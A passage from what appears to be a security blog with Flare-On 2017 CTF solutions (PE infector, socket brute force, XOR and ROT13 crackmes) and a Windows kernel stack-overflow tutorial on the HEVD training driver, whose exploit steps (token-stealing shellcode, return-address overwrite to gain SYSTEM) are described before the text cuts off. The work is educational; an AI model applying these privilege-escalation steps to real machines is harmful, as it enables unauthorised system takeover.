kernel32_ReadFile = sub_1015310(user32.dll, 0x10FA6516);
kernel32_WriteFile = sub_1015310(user32.dll, 0xE80A791F);
kernel32_GetFileSize = sub_1015310(user32.dll, 0xDF7D9BAD);
kernel32_FlushViewOfFile = sub_1015310(user32.dll, 0xB12C56D7);
kernel32_LoadLibraryA = sub_1015310(user32.dll, 0xEC0E4E8E);
kernel32_GetProcAddress = sub_1015310(user32.dll, 0x7C0DFCAA);
kernel32_GetModuleHandleA = sub_1015310(user32.dll, 0xD3324904);
kernel32_UnmapViewOfFile = sub_1015310(user32.dll, 0xB2089259);
kernel32_ExpandEnvironmentStringsA = sub_1015310(user32.dll, 0xEEB585D8);
kernel32_FileTimeToSystemTime = sub_1015310(user32.dll, 0x3810CB0F);
kernel32_GetTimeFormatA = sub_1015310(user32.dll, 0xF02A93BE);
kernel32_GetDateFormatA = sub_1015310(user32.dll, 0xF72A53BA);
</code></pre></div></div>
<p>At the end of the entry point function we see that the program looks for files in <code class="highlighter-rouge">%USERPROFILE%\flareon2016challenge</code> that have PE headers, using the <code class="highlighter-rouge">FindFirstFileA</code> / <code class="highlighter-rouge">FindNextFileA</code> APIs. When it finds an executable file, it calls the function at <code class="highlighter-rouge">0x1014E20</code> to infect it. This type of malware is called a <code class="highlighter-rouge">PE infector</code>.</p>
<p>The function at <code class="highlighter-rouge">0x1014E20</code> locates the MZ header and the PE header, compares timestamp values and infects other PE files. For the PE executable format, the “010 Editor” PE template <a href="https://www.sweetscape.com/010editor/templates/">PETemplate.bt</a> helps when analysing the PE timestamp. At <code class="highlighter-rouge">0x10146C0</code>, the code compares the compile timestamp of the currently executing PE against a hard-coded value, then compares the compile timestamp of the discovered PE against another hard-coded value. This comparison is repeated for several pairs of timestamp values until both match. In the infection code at <code class="highlighter-rouge">0x101500B</code> (inside <code class="highlighter-rouge">0x1014E20</code>), it checks for the value <code class="highlighter-rouge">0x8675309</code> at offset <code class="highlighter-rouge">0x1C</code> of the PE and does not infect the file if it is found; when infecting, it writes this value to that offset. This is known as an “infection marker” and makes sure an executable is only infected once.</p>
<p>When a successful match is found, the second timestamp value is converted to a string, printed in a message box, and <code class="highlighter-rouge">key.bin</code> is generated. Following the function at <code class="highlighter-rouge">0x10145B0</code>, eight bytes from offset <code class="highlighter-rouge">0x0C</code> of the PE are appended to a file named <code class="highlighter-rouge">key.bin</code>. This is the first message box that pops up:</p>
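<p>A small scanner, added here and not part of the original post or of the challenge, that extracts exactly the fields the infector examines: the PE <code class="highlighter-rouge">TimeDateStamp</code>, the infection marker at offset <code class="highlighter-rouge">0x1C</code> and the eight bytes at offset <code class="highlighter-rouge">0x0C</code>. The PE image it scans is constructed inside the script (headers only), and the timestamp pairs are the ones listed in the table in the Solutions section.</p>

```python
import struct

INFECTION_MARKER = 0x8675309   # value the infector writes at offset 0x1C
MARKER_OFFSET = 0x1C
KEY_OFFSET = 0x0C              # eight bytes from here are appended to key.bin
KEY_LEN = 8

# Timestamp pairs from the writeup's table: (timestamp of the infected file,
# timestamp of the 2016 challenge binary the running file has to find).
TIMESTAMP_PAIRS = [
    (0x57D1B2A2, 0x48025287),  # (Challenge1) challenge1.exe
    (0x57D2B0F8, 0x57D1B2A2),  # (Challenge2) DudeLocker.exe
    (0x49180192, 0x57D2B0F8),  # (Challenge6) khaki.exe
    (0x579E9100, 0x49180192),  # (Challenge3) unknown
]


def build_sample_pe(timestamp, infected=False):
    """Constructed minimal MZ/PE image (headers only) so the scanner runs offline."""
    dos = bytearray(64)                      # IMAGE_DOS_HEADER
    dos[0:2] = b"MZ"
    # constructed filler at 0x0C..0x13: the bytes the infector copies into key.bin
    dos[KEY_OFFSET:KEY_OFFSET + KEY_LEN] = bytes(range(0x41, 0x49))
    if infected:
        struct.pack_into("<I", dos, MARKER_OFFSET, INFECTION_MARKER)
    struct.pack_into("<I", dos, 0x3C, 64)    # e_lfanew: PE signature right after DOS header
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0, 0x102)
    return bytes(dos) + b"PE\0\0" + file_header


def inspect_pe(data):
    """Return the fields the infector looks at, or None if data is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (timestamp,) = struct.unpack_from("<I", data, e_lfanew + 8)   # TimeDateStamp
    (marker,) = struct.unpack_from("<I", data, MARKER_OFFSET)
    return {
        "timestamp": timestamp,
        "infected": marker == INFECTION_MARKER,
        "key_bytes": data[KEY_OFFSET:KEY_OFFSET + KEY_LEN],
    }


def stage_for(infected_ts, challenge_ts):
    """Index of the matching (infected, challenge) timestamp pair, or None."""
    for idx, pair in enumerate(TIMESTAMP_PAIRS):
        if pair == (infected_ts, challenge_ts):
            return idx
    return None


if __name__ == "__main__":
    for ts in (0x48025287, 0x57D1B2A2):
        info = inspect_pe(build_sample_pe(ts, infected=(ts == 0x57D1B2A2)))
        print("timestamp=0x%08X infected=%s key=%s"
              % (info["timestamp"], info["infected"], info["key_bytes"].hex()))
```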
<p><img src="https://i.imgur.com/R2IiXIW.png" alt="" /></p>
<ul>
<li>Solutions:</li>
</ul>
<p>So far we know that we need some files from the 2016 Flare-On challenge that meet the timestamp requirements. After finding them, put those files in the <code class="highlighter-rouge">%USERPROFILE%\flareon2016challenge</code> directory. <code class="highlighter-rouge">notepad.exe</code> then checks the timestamp of those files; if it matches, the file timestamp is converted to a string and printed in a message box, and eight bytes from offset <code class="highlighter-rouge">0x0C</code> of the PE are appended to the <code class="highlighter-rouge">key.bin</code> file.</p>
<p>The code block from <code class="highlighter-rouge">0x1014B4B</code> to <code class="highlighter-rouge">0x1014D0A</code> checks the file timestamps and writes the <code class="highlighter-rouge">key.bin</code> file. In total we need four files; the required order and timestamps are:</p>
<table>
<thead>
<tr>
<th>Timestamp of infected file</th>
<th>Timestamp of 2016’s FLARE On challenge</th>
<th>challenge name</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x57D1B2A2</td>
<td>0x48025287</td>
<td>(Challenge1) challenge1.exe</td>
</tr>
<tr>
<td>0x57D2B0F8</td>
<td>0x57D1B2A2</td>
<td>(Challenge2) DudeLocker.exe</td>
</tr>
<tr>
<td>0x49180192</td>
<td>0x57D2B0F8</td>
<td>(Challenge6) khaki.exe</td>
</tr>
<tr>
<td>0x579E9100</td>
<td>0x49180192</td>
<td>(Challenge3) unknown</td>
</tr>
</tbody>
</table>
<p>The final timestamp comparison is performed only on the running executable. If it matches, 32 bytes are read from the <code class="highlighter-rouge">key.bin</code> file and XORed against a 32-byte string of unprintable characters stored in a local variable.</p>
<p>Finally, run the binaries in this order: challenge1.exe, DudeLocker.exe, khaki.exe, and unknown. We then get the flag in a message box.</p>
<p><code class="highlighter-rouge">bl457_fr0m_th3_p457@flare-on.com</code></p>
<hr />
<ul>
<li>Challenge Author: James T. Bennett (@jtbennettjr)</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/04_Notepad/notepad.exe">Challenge download</a></li>
</ul>
2017 Flare-On Challenge 3 Greektome.exe
2018-05-22T00:00:00+00:00
http://0x00.tw/2018/05/22/2017 Flare-On #3 Greektome
<p><code class="highlighter-rouge">Greek_to_me.exe</code> is a Windows x86 executable. When we launch the binary, we can’t input anything, and we don’t get any output from the binary. It gets stuck waiting for us to do something.</p>
<ul>
<li>Analysis:</li>
</ul>
<p>When we open it in IDA, we can see it calls <code class="highlighter-rouge">socket</code> at <code class="highlighter-rouge">0x401151</code>; the binary uses the standard series of Windows API functions: <code class="highlighter-rouge">socket</code>, <code class="highlighter-rouge">bind</code>, <code class="highlighter-rouge">listen</code>, and <code class="highlighter-rouge">accept</code>.</p>
<p>So far we know the binary listens for a TCP connection from localhost on port 2222 (0x8AE). It then reads the received input in <code class="highlighter-rouge">sub_401121</code> into a register; the input is handled as a 32-bit integer.</p>
<p><img src="https://i.imgur.com/szZCmXr.png" alt="" /></p>
<p>Additionally, there is an interesting string in the program at virtual address <code class="highlighter-rouge">0x401101</code>: <code class="highlighter-rouge">Congratulations! But wait, where',27h,'s my flag?</code> (IDA shows the apostrophe as <code class="highlighter-rouge">27h</code>).</p>
<p><img src="https://i.imgur.com/fSeXBij.png" alt="" /></p>
<p>At <code class="highlighter-rouge">0x401036</code>, the first byte of the recv buffer is moved into the low eight bits of the EDX register. Then, looking at <code class="highlighter-rouge">loc_40107C</code> and <code class="highlighter-rouge">loc_401039</code>, the address <code class="highlighter-rouge">0x40107C</code> is moved into the <code class="highlighter-rouge">EAX</code> register; it is the start address of the decoding loop.</p>
<p>The decoding loop performs a few operations. First, it takes one byte at the address held in <code class="highlighter-rouge">EAX</code> (initially <code class="highlighter-rouge">0x40107C</code>). Next, it XORs that byte with the first byte received over the listening socket, then adds 34 (0x22). The resulting byte overwrites the byte at the address in <code class="highlighter-rouge">EAX</code>.</p>
<p><img src="https://i.imgur.com/tx8jK96.png" alt="" /></p>
<p>Further, the <code class="highlighter-rouge">sub_4011E6</code> function computes a hash; its arguments are the start address of the modified code (<code class="highlighter-rouge">0x40107C</code>) and the length 121 (0x79). Inside <code class="highlighter-rouge">sub_4011E6</code>, a 16-bit hash (<code class="highlighter-rouge">AX</code>) is calculated and compared for equality against 64350 (0xFB5E). If the hash matches, the decoded code is executed instead of printing the error message <code class="highlighter-rouge">Nope, that’s not it</code>.</p>
<ul>
<li>Solutions:</li>
</ul>
<p>The key is only a single byte, so there are just 256 possibilities. The following Python code brute-forces them and finds <code class="highlighter-rouge">0xA2</code> (<code class="highlighter-rouge">ó</code>) as the key:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import os
import socket
import time

# socket info: the binary listens on localhost:2222
HOST = '127.0.0.1'
PORT = 2222

for i in range(256):
    # launch the challenge binary for every attempt
    filepath = 'greek_to_me.exe'
    os.startfile(filepath)
    time.sleep(0.1)
    # connect to the listener and send the single candidate key byte
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.sendall(bytes([i]))
    data = s.recv(1024)
    s.close()
    if data == b"Congratulations! But wait, where's my flag?":
        print(i)
        print(chr(i))
        print('Received', repr(data))
</code></pre></div></div>
<p>Putting a breakpoint at <code class="highlighter-rouge">0x401063</code> in IDA, we find the flag written to the stack: <code class="highlighter-rouge">et_tu_brute_force@flare-on.com</code></p>
<ul>
<li>Notes:
<ul>
<li>Comparison of <code class="highlighter-rouge">127.0.0.1</code> and <code class="highlighter-rouge">0.0.0.0</code>:
<ul>
<li><code class="highlighter-rouge">127.0.0.1</code> is the loopback interface; when a server listens on <code class="highlighter-rouge">127.0.0.1</code> it only accepts connections from within the same host.</li>
<li>When a server listens on <code class="highlighter-rouge">0.0.0.0</code>, it listens on every available network interface.</li>
</ul>
</li>
</ul>
</li>
</ul>
<hr />
<ul>
<li>Challenge Author: Matt Williams (@0xmwilliams)</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/03_Greek_to_me/greek_to_me.exe">Challenge download</a></li>
</ul>
2017 Flare-On Challenge 2 IgniteMe.exe
2018-05-20T00:00:00+00:00
http://0x00.tw/2018/05/20/2017 Flare-On #2 IgniteMe
<p>This is a crack me challenge. <code class="highlighter-rouge">IgniteMe.exe</code> expects to run without any command line argument. It asks the player to input the flag and checks whether it’s correct or not.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\nnyl\Desktop\flareon4\Challenge2>IgniteMe.exe
G1v3 m3 t3h fl4g: flareon
N0t t00 h0t R we? 7ry 4ga1nz plzzz!
</code></pre></div></div>
<ul>
<li>Analysis:</li>
</ul>
<p><img src="https://i.imgur.com/3rA8jZy.png" alt="" /></p>
<p>The <code class="highlighter-rouge">sub_4010F0</code> function reads the user input and stores it at <code class="highlighter-rouge">0x403078</code>.</p>
<p>The <code class="highlighter-rouge">sub_401050</code> function validates the flag. Focusing on the code block between <code class="highlighter-rouge">0x401088</code> and <code class="highlighter-rouge">0x4010AD</code>, you can see the input being processed by an XOR loop and checked against the data <code class="highlighter-rouge">enc</code> (at <code class="highlighter-rouge">0x0403000</code>).</p>
<p><img src="https://i.imgur.com/hoqtTCR.png" alt="" /></p>
<p>The <code class="highlighter-rouge">sub_401000</code> function generates the key; its initial seed is the number 4.</p>
<ul>
<li>Solutions:</li>
</ul>
<p>In the first loop, <code class="highlighter-rouge">IgniteMe.exe</code> XORs 0x04 with the last character of the user input. Each input character then serves as the XOR key for the character before it (the second from last, and so on towards the first). The global variable <code class="highlighter-rouge">byte_403180</code> stores the encoded user input.</p>
<p>Once the user input has been encoded, it is compared against <code class="highlighter-rouge">enc</code>; if it matches, the program prints <code class="highlighter-rouge">G00d j0b!</code>.</p>
<p>Therefore, we can decode <code class="highlighter-rouge">enc</code> directly:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.data:00403000 ; char enc[]
.data:00403000 enc dd 4549260Dh
.data:00403004 dd 4478172Ah
.data:00403008 dd 5E5D6C2Bh
.data:0040300C dd 172F1245h
.data:00403010 dd 6E6F442Bh
.data:00403014 dd 455F0956h
.data:00403018 dd 0A267347h
.data:0040301C dd 4817130Dh
.data:00403020 dd 4D400142h
.data:00403024 dd 69020Ch
</code></pre></div></div>
<p>The following script obtains the flag.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># bytes of enc from .data:00403000 (little-endian dwords above, read byte by byte)
enc = [0x0D, 0x26, 0x49, 0x45, 0x2A, 0x17, 0x78, 0x44, 0x2B, 0x6C, 0x5D, 0x5E, 0x45, 0x12, 0x2F, 0x17,
       0x2B, 0x44, 0x6F, 0x6E, 0x56, 0x09, 0x5F, 0x45, 0x47, 0x73, 0x26, 0x0A, 0x0D, 0x13, 0x17, 0x48,
       0x42, 0x01, 0x40, 0x4D, 0x0C, 0x02, 0x69]

v4 = 4  # key: the initial seed from sub_401000
ans = ''
# walk enc from the last byte to the first; each decoded character
# becomes the key for the byte before it
for i in range(len(enc)):
    v4 = v4 ^ enc[-i-1]
    ans += chr(v4)
    print(hex(enc[-i-1]))
print(ans[::-1])
</code></pre></div></div>
<p>Flag: <code class="highlighter-rouge">R_y0u_H0t_3n0ugH_t0_1gn1t3@flare-on.com</code></p>
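<p>Both directions of the scheme, added as an example and not code from the challenge or from the original post: <code class="highlighter-rouge">encode</code> mirrors the binary’s loop, <code class="highlighter-rouge">decode</code> inverts it, and <code class="highlighter-rouge">check_flag</code> reproduces the comparison the binary makes against <code class="highlighter-rouge">enc</code>. The <code class="highlighter-rouge">ENC</code> bytes are those listed above.</p>

```python
# Encoded flag bytes stored at .data:00403000 in IgniteMe.exe (from the writeup).
ENC = bytes([
    0x0D, 0x26, 0x49, 0x45, 0x2A, 0x17, 0x78, 0x44, 0x2B, 0x6C, 0x5D, 0x5E, 0x45,
    0x12, 0x2F, 0x17, 0x2B, 0x44, 0x6F, 0x6E, 0x56, 0x09, 0x5F, 0x45, 0x47, 0x73,
    0x26, 0x0A, 0x0D, 0x13, 0x17, 0x48, 0x42, 0x01, 0x40, 0x4D, 0x0C, 0x02, 0x69,
])
SEED = 4  # initial key produced by sub_401000


def encode(plaintext, seed=SEED):
    """Mirror of the binary's loop: walk the input backwards, XOR each byte with
    the current key, then the plaintext byte just processed becomes the next key."""
    out = bytearray(len(plaintext))
    key = seed
    for i in range(len(plaintext) - 1, -1, -1):
        out[i] = plaintext[i] ^ key
        key = plaintext[i]
    return bytes(out)


def decode(ciphertext, seed=SEED):
    """Inverse: XOR with the key recovers the plaintext byte, which is the next key."""
    out = bytearray(len(ciphertext))
    key = seed
    for i in range(len(ciphertext) - 1, -1, -1):
        out[i] = ciphertext[i] ^ key
        key = out[i]
    return bytes(out)


def check_flag(candidate):
    """The validation the binary performs: encode the input and compare it to ENC."""
    return len(candidate) == len(ENC) and encode(candidate) == ENC


if __name__ == "__main__":
    flag = decode(ENC)
    print(flag.decode("ascii"), check_flag(flag))
```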
<hr />
<ul>
<li>Challenge #2 by Nhan Huynh</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/02_IgniteMe/IgniteMe.exe">Challenge download</a></li>
</ul>
2017 Flare-On Challenge 1 login.html
2018-05-10T00:00:00+00:00
http://0x00.tw/2018/05/10/2017 Flare-On #1 Login
<p><a href="http://flare-on.com">Flare-On Challenge</a> is the FireEye Labs Advanced Reverse Engineering (FLARE) team’s yearly reverse engineering contest. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals.</p>
<ul>
<li><a href="https://github.com/0x000050/CTF/tree/master/2017_Flare-On">Challenges download</a></li>
<li>The <a href="https://www.fireeye.com/blog/threat-research/2017/10/2017-flare-on-challenge-solutions.html">solutions</a> written by each challenge author</li>
</ul>
<hr />
<p>login.html</p>
<p>There is an HTML file with a form. We need to provide a flag and check for its correctness.</p>
<p><img src="https://i.imgur.com/BkoCOyn.png" alt="" /></p>
<p>Here is the content of <code class="highlighter-rouge">login.html</code>: the HTML page contains a simple client-side JavaScript check based on ROT13.</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><!DOCTYPE Html /></span>
<span class="nt"><html></span>
<span class="nt"><head></span>
<span class="nt"><title></span>FLARE On 2017<span class="nt"></title></span>
<span class="nt"></head></span>
<span class="nt"><body></span>
<span class="nt"><input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"flag"</span> <span class="na">id=</span><span class="s">"flag"</span> <span class="na">value=</span><span class="s">"Enter the flag"</span> <span class="nt">/></span>
<span class="nt"><input</span> <span class="na">type=</span><span class="s">"button"</span> <span class="na">id=</span><span class="s">"prompt"</span> <span class="na">value=</span><span class="s">"Click to check the flag"</span> <span class="nt">/></span>
<span class="nt"><script </span><span class="na">type=</span><span class="s">"text/javascript"</span><span class="nt">></span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"prompt"</span><span class="p">).</span><span class="nx">onclick</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">flag</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"flag"</span><span class="p">).</span><span class="nx">value</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">rotFlag</span> <span class="o">=</span> <span class="nx">flag</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">[</span><span class="sr">a-zA-Z</span><span class="se">]</span><span class="sr">/g</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">c</span><span class="p">){</span>
<span class="k">return</span> <span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">((</span><span class="nx">c</span> <span class="o"><=</span> <span class="s2">"Z"</span> <span class="p">?</span> <span class="mi">90</span> <span class="p">:</span> <span class="mi">122</span><span class="p">)</span> <span class="o">>=</span> <span class="p">(</span><span class="nx">c</span> <span class="o">=</span> <span class="nx">c</span><span class="p">.</span><span class="nx">charCodeAt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="mi">13</span><span class="p">)</span> <span class="p">?</span> <span class="nx">c</span> <span class="p">:</span> <span class="nx">c</span> <span class="o">-</span> <span class="mi">26</span><span class="p">);});</span>
<span class="k">if</span> <span class="p">(</span><span class="s2">"PyvragFvqrYbtvafNerRnfl@syner-ba.pbz"</span> <span class="o">==</span> <span class="nx">rotFlag</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Correct flag!"</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Incorrect flag, rot again"</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nt"></script></span>
<span class="nt"></body></span>
<span class="nt"></html></span>
</code></pre></div></div>
<p>Use Python to decode the string and extract the flag:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import codecs
print(codecs.decode("PyvragFvqrYbtvafNerRnfl@syner-ba.pbz", 'rot_13'))
</code></pre></div></div>
<p>The ROT13 form of <code class="highlighter-rouge">PyvragFvqrYbtvafNerRnfl@syner-ba.pbz</code> is <code class="highlighter-rouge">ClientSideLoginsAreEasy@flare-on.com</code>; entering it in the form makes the message box show “Correct flag!”, and it is the flag for this challenge.</p>
<hr />
<ul>
<li>Challenge #1 by Dominik Weber (@Invalid_handle)</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/01_Login/login.html">Challenge download</a></li>
</ul>
Windows Kernel Exploit - Stack Overflow
2018-01-10T00:00:00+00:00
http://0x00.tw/2018/01/10/Windows Kernel Exploit - Stack Overflow
<p>This post uses HEVD as a hands-on case study. HEVD is a kernel driver developed by HackSysTeam; the project contains many common vulnerability classes and is well suited to researchers who want to practise Windows kernel exploitation and the various exploitation techniques. The example here is Windows 7; the Windows 7 machine under test has neither SMEP nor SMAP, which makes it relatively simple. I may also practise on other Windows versions when I get the chance.</p>
<h3 id="description">Description</h3>
<ul>
<li>This post skips the preparation of the working environment and focuses on the details of the exploitation steps.</li>
<li>The Windows driver used here is <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver">HackSysExtremeVulnerableDriver</a>; it was chosen for the demonstration because its source code is available (which makes the vulnerabilities easier to understand). For related solutions, see <a href="https://github.com/FuzzySecurity/HackSysTeam-PSKernelPwn">FuzzySecurity’s PowerShell Kernel Pwn</a>.</li>
</ul>
<h3 id="environment">Environment</h3>
<ul>
<li>Windows 7 x86 SP1 (Version 6.1.7601)</li>
<li>No SMEP (supervisor mode execution prevention) protection</li>
<li>No SMAP (supervisor mode access prevention) protection</li>
</ul>
<h3 id="tools">Tools</h3>
<ul>
<li>VMware Workstation 12</li>
<li>Visual Studio 2017</li>
<li>WinDBG</li>
<li>IDA Pro</li>
<li>osrloaderv30</li>
<li>cmd</li>
</ul>
<h3 id="vulnerability">Vulnerability</h3>
<p>This is a stack overflow vulnerability in a Windows kernel driver; let’s look at the details of the vulnerability.</p>
<p>Research on a Windows kernel driver usually starts from the function that handles IOCTLs, which can be found through <code class="highlighter-rouge">DriverObject -> MajorFunction[IRP_MJ_DEVICE_CONTROL]</code> in <code class="highlighter-rouge">DriverEntry</code>. In the HackSysTeam driver, the stack overflow is triggered through the control code <code class="highlighter-rouge">0x222003</code>.</p>
<p><img src="https://i.imgur.com/v26v5uU.png" alt="" /></p>
<p>A quick note on <a href="https://msdn.microsoft.com/zh-tw/library/windows/desktop/aa363216(v=vs.85).aspx">IOCTL</a>: in a Windows kernel driver, IOCTL is the communication channel between user mode and the kernel driver, and the kernel and user mode exchange data through it. When a kernel driver handles data passed in from user mode without validating it, problems can arise.</p>
<pre><code class="language-clike">BOOL WINAPI DeviceIoControl(
    _In_        HANDLE       hDevice,
    _In_        DWORD        dwIoControlCode,
    _In_opt_    LPVOID       lpInBuffer,
    _In_        DWORD        nInBufferSize,
    _Out_opt_   LPVOID       lpOutBuffer,
    _In_        DWORD        nOutBufferSize,
    _Out_opt_   LPDWORD      lpBytesReturned,
    _Inout_opt_ LPOVERLAPPED lpOverlapped
);
</code></pre>
<p>With IOCTL covered, back to the vulnerability under discussion. HackSys Team provides the <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/StackOverflow.c">source code</a> of <code class="highlighter-rouge">StackOverflow.c</code>, so let’s look at the relevant part of it to understand the vulnerability.</p>
<pre><code class="language-clike">NTSTATUS TriggerStackOverflow(IN PVOID UserBuffer, IN SIZE_T Size) {
    NTSTATUS Status = STATUS_SUCCESS;
    ULONG KernelBuffer[2048] = {0};

    PAGED_CODE();

    __try {
        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(KernelBuffer));

        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
        DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
        DbgPrint("[+] KernelBuffer Size: 0x%X\n", sizeof(KernelBuffer));

#ifdef SECURE
        // Secure Note: This is secure because the developer is passing a size
        // equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence,
        // there will be no overflow
        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
        // the copy length is bounded with sizeof
#else
        DbgPrint("[+] Triggering Stack Overflow\n");

        // Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
        // because the developer is passing the user supplied size directly to
        // RtlCopyMemory()/memcpy() without validating if the size is greater or
        // equal to the size of KernelBuffer
        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size); // Size is the size of UserBuffer
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}
</code></pre>
<p><code class="highlighter-rouge">RtlCopyMemory</code> is <code class="highlighter-rouge">memcpy</code>. The common mistake is not checking the arguments or the size passed in from user mode. First the problematic form (line 28 of the source file); here <code class="highlighter-rouge">Size</code> is the size of UserBuffer:</p>
<pre><code class="language-clike">RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);
</code></pre>
<p>The correct form uses <code class="highlighter-rouge">sizeof</code> to bound the memcpy so that the copied length cannot exceed <code class="highlighter-rouge">KernelBuffer</code>:</p>
<pre><code class="language-clike">RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
</code></pre>
<p>Without the check the copy can overflow and overwrite the return address (ret):</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-0000081C KernelBuffer db 2048 dup(?)
-0000001C var_1C dd ?
-00000018 ms_exc CPPEH_RECORD ?
+00000000 s db 4 dup(?)
+00000004 r db 4 dup(?)
+00000008 UserBuffer dd ? ; offset
+0000000C Size dd ?
+00000010
+00000010 ; end of stack variables
</code></pre></div></div>
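<p>The following is an added user-mode model, not HEVD's code, of the check the driver needs: the user-supplied <code class="highlighter-rouge">Size</code> is compared against the destination before anything is copied, and an oversize request is refused with an NTSTATUS instead of being copied blindly. The function names and the constructed <code class="highlighter-rouge">demo_request</code> inputs are this example's; the status values are the ones from ntstatus.h.</p>

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* NTSTATUS values used by this model (from ntstatus.h). */
#define STATUS_SUCCESS             0x00000000u
#define STATUS_INVALID_BUFFER_SIZE 0xC0000206u

#define KERNEL_BUFFER_ELEMS 2048   /* same as ULONG KernelBuffer[2048] in the driver */

/* Bounds-checked copy: `size` is what the caller (user mode) claimed, so it is
 * compared against the real destination size before any byte moves. Returns the
 * status the IOCTL would complete with. */
uint32_t copy_user_buffer_checked(void *kernel_buffer, size_t kernel_buffer_bytes,
                                  const void *user_buffer, size_t size) {
    if (size > kernel_buffer_bytes)
        return STATUS_INVALID_BUFFER_SIZE;   /* refuse; do not truncate silently */
    memcpy(kernel_buffer, user_buffer, size);
    return STATUS_SUCCESS;
}

/* Model of TriggerStackOverflow with the check in place: a local buffer of the
 * driver's size, then the checked copy of exactly `size` bytes. */
uint32_t trigger_stack_overflow_checked(const void *user_buffer, size_t size) {
    uint32_t kernel_buffer[KERNEL_BUFFER_ELEMS] = {0};
    return copy_user_buffer_checked(kernel_buffer, sizeof kernel_buffer,
                                    user_buffer, size);
}

/* Constructed request data: a user buffer filled with 0x41, sized so that every
 * request below (in-bounds, exact fit, oversize) stays inside it. */
static uint32_t g_user_data[KERNEL_BUFFER_ELEMS + 64];

/* Issue a request claiming `elems` ULONGs and return the resulting status. */
uint32_t demo_request(size_t elems) {
    size_t max_elems = sizeof g_user_data / sizeof g_user_data[0];
    if (elems > max_elems)
        elems = max_elems;
    memset(g_user_data, 0x41, sizeof g_user_data);
    return trigger_stack_overflow_checked(g_user_data, elems * sizeof(uint32_t));
}

int main(void) {
    printf("  16 ULONGs: 0x%08X\n", demo_request(16));
    printf("2048 ULONGs: 0x%08X\n", demo_request(KERNEL_BUFFER_ELEMS));
    printf("2052 ULONGs: 0x%08X\n", demo_request(KERNEL_BUFFER_ELEMS + 4));
    return 0;
}
```

<p>Note the difference from the SECURE build shown above: copying a fixed <code class="highlighter-rouge">sizeof(KernelBuffer)</code> can never overflow the stack, but it reads beyond the end of any user buffer shorter than 8192 bytes. Rejecting <code class="highlighter-rouge">Size &gt; sizeof(KernelBuffer)</code> and copying exactly <code class="highlighter-rouge">Size</code> avoids both the overflow and the over-read.</p>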
<h3 id="exploit">Exploit</h3>
<ul>
<li>First, allocate a block of readable, writable and executable (RWX) memory in user mode to hold the shellcode</li>
<li>Place the token stealing shellcode in that memory</li>
<li>Obtain a handle to the HacksysExtremeVulnerableDriver device</li>
<li>Overwrite the return address with the address of the shellcode in userland; when the function returns, the shellcode runs</li>
<li>The shellcode locates the system process (PID = 4) and takes its token</li>
<li>Restore the stack frame, otherwise the machine blue-screens, since all of this runs in the kernel</li>
<li>Holding the system token means having system privileges; a cmd.exe created with them runs as system</li>
</ul>
<p>The HackSys Extreme Vulnerable Driver exploit, <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/StackOverflow.c">StackOverflow.c</a>:</p>
<pre><code class="language-clike">#include "StackOverflow.h"

